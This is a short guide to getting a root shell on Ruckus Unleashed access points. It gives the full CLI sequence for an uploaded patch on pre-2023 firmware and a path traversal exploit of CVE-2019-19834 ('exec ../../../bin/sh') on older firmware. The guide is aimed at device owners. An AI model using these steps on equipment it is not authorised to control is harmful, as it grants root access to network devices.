Obtaining a root shell on Ruckus Unleashed APs
The Ruckus Unleashed CLI includes an exec command which allows you to execute scripts which are preinstalled or have subsequently been uploaded to your AP.
- Older Unleashed firmwares contain a path traversal vulnerability which allows the
execcommand to run arbitrary command. - Newer Unleased firmwares will run arbitrary commands if they are packaged and uploaded as a firmware upgrade.
Unleashed releases after 30 Aug 2023 (e.g. 200.7.10.202.145+, 200.14.6.1.203+)
Sorry, I don't have a method to obtain a root shell on newer Unleashed AP firmwares.
If your AP was released before mid-2022 then you can temporarily downgrade to an older Unleashed firmware.
Unleashed releases prior to 30 Aug 2023
This patch should be uploaded as a Preload Image (Admin & Services > Administration > Upgrade > Local Upgrade > Preload Image).
The upload process completes the patching; no upgrade will be offered.
To access the root shell from the CLI:-
ruckus> enable
ruckus# debug
You have all rights in this mode.
ruckus(debug)# script
ruckus(script)# exec .root.sh
Ruckus Wireless Unleashed -- Command Line Interface
Enter 'help' for a list of built-in commands.
ruckus$TIP
You can, if you wish, create the patch yourself, or decrypt the patch to verify it's only doing what it should.
Unleashed 200.0 - 200.7.10.202.94
Use CVE-2019-19834:-
To access a root shell from the CLI:-
ruckus> enable
ruckus# debug
You have all rights in this mode.
ruckus(debug)# script
ruckus(script)# exec ../../../bin/sh
Ruckus Wireless Unleashed -- Command Line Interface
Enter 'help' for a list of built-in commands.
ruckus$ stty echo
ruckus$TIP
You won't be able to see yourself typing stty echo. Calling stty echo restores local echo so you can see what you're typing.